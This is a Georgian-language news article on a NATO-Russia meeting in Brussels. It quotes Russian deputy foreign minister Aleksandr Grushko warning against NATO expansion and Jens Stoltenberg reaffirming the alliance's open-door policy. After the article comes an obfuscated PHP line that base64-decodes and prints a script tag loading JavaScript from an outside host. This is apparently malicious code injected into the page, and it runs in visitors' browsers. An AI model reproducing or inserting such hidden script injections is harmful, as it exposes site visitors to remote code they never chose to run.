celsiusi
ავერსი საქკაბელი
ნატოს გაფართოება მიუღებელ რისკებს შეიცავს და რუსეთი მას წინ აღუდგება, - ამის შესახებ რუსეთის საგარეო საქმეთა მინისტრის მოადგილემ, ალექსანდრე გრუშკომ განაცხაა. 
 
მისივე განცხადებით, რუსეთმა NATO-რუსეთის მოლაპარაკებების ფორმატში ალიანსს „პირდაპირ მიანიშნა, რომ ვითარების შემდგომმა დაძაბვამ შეიძლება გამოიწვიოს მძიმე შედეგები ევროპის უსაფრთხოებისთვის“.
 
„ჩვენ ძალიან გულწრფელად, პირდაპირ, პოლიტიკურად კორექტული ფორმულების გამოყენებით აღვნიშნეთ, რომ სიტუაციის შემდგომმა გაუარესებაბ, შესაძლოა, გამოიწვიოს ევროპის უსაფრთხოებისთვის ყველაზე არაპროგნოზირებადი და ყველაზე საშინელი შედეგები. რუსეთი არ ეთანხმება ამ სცენარს“, – განაცხადა გრუშკომ შეხვედრის შემდეგ გამართულ პრესკონფერენციაზე.
 
ალიანსსა და რუსეთს შორის შეხვედრა ბრიუსელში დღეს გაიმართა, რომელიც 4 საათი გაგრძელდა.
 
შეხვედრაზე მხარეებმა ევროპის აღმოსავლეთ ნაწილში, მათ შორის უკრაინის ირგვლივ შექმნილი ვითარება განიხილეს.
 
ნატოს გენერალური მდივნის, იენს სტოლტენბერგის განცხადებით, NATO-რუსეთის შეხვედრისას რუსეთმა კიდევ ერთხელ მოითხოვა დეკემბერში გაცხადებული შეთავაზებების შესრულება, ხოლო NATO-ს წევრებმა კიდევ ერთხელ დაადასტურეს ალიანსის „ღია კარის“ პოლიტიკისადმი მხარდაჭერა.
 
„ეს არ ყოფილა ადვილი დისკუსია, მაგრამ სწორედ ესაა მიზეზი, თუ რატომ იყო ესოდენ მნიშვნელოვანი“, – ასე დაიწყო სტოლტენბერგმა შეხვედრის შესახებ საუბარი.
 
მისი განცხადებით, არსებობს მნიშვნელოვანი განსხვავებები ნატოს მოკავშირეებსა და რუსეთს შორის.
 
„დღეს რუსეთმა წამოჭრა ის წინადადებები, რომლებიც ეხება რუსეთის უსაფრთხოების რისკებს და რომლის შესახებაც დეკემბერში განაცხადეს. ეს მოიცავს მოთხოვნებს, რომ ნატომ შეწყვიტოს ახალი წევრების მიღება და გაიწვიოს საკუთარი ძალები აღმოსავლეთ მოკავშირეების ტერიტორიიდან.
 
თავის მხრივ, NATO-ს წევრებმა კიდევ ერთხელ დაადასტურეს „ღია კარის“ პოლიტიკისადმი და სახელმწიფოთა მიერ უსაფრთხოების პოლიტიკის დამოუკიდებლად წარმოების უფლებისადმი მხარდაჭერა.
 
მოკავშირეებმა ნათლად განაცხადეს, რომ ისინი არ შეწყვეტენ ერთმანეთის დაცვასა და მხარდაჭერას, მათ შორის ალიანსის აღმოსავლეთ ფლანგზე ძალების განლაგებით“, – განაცხადა იენს სტოლტენბერგმა.
901
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");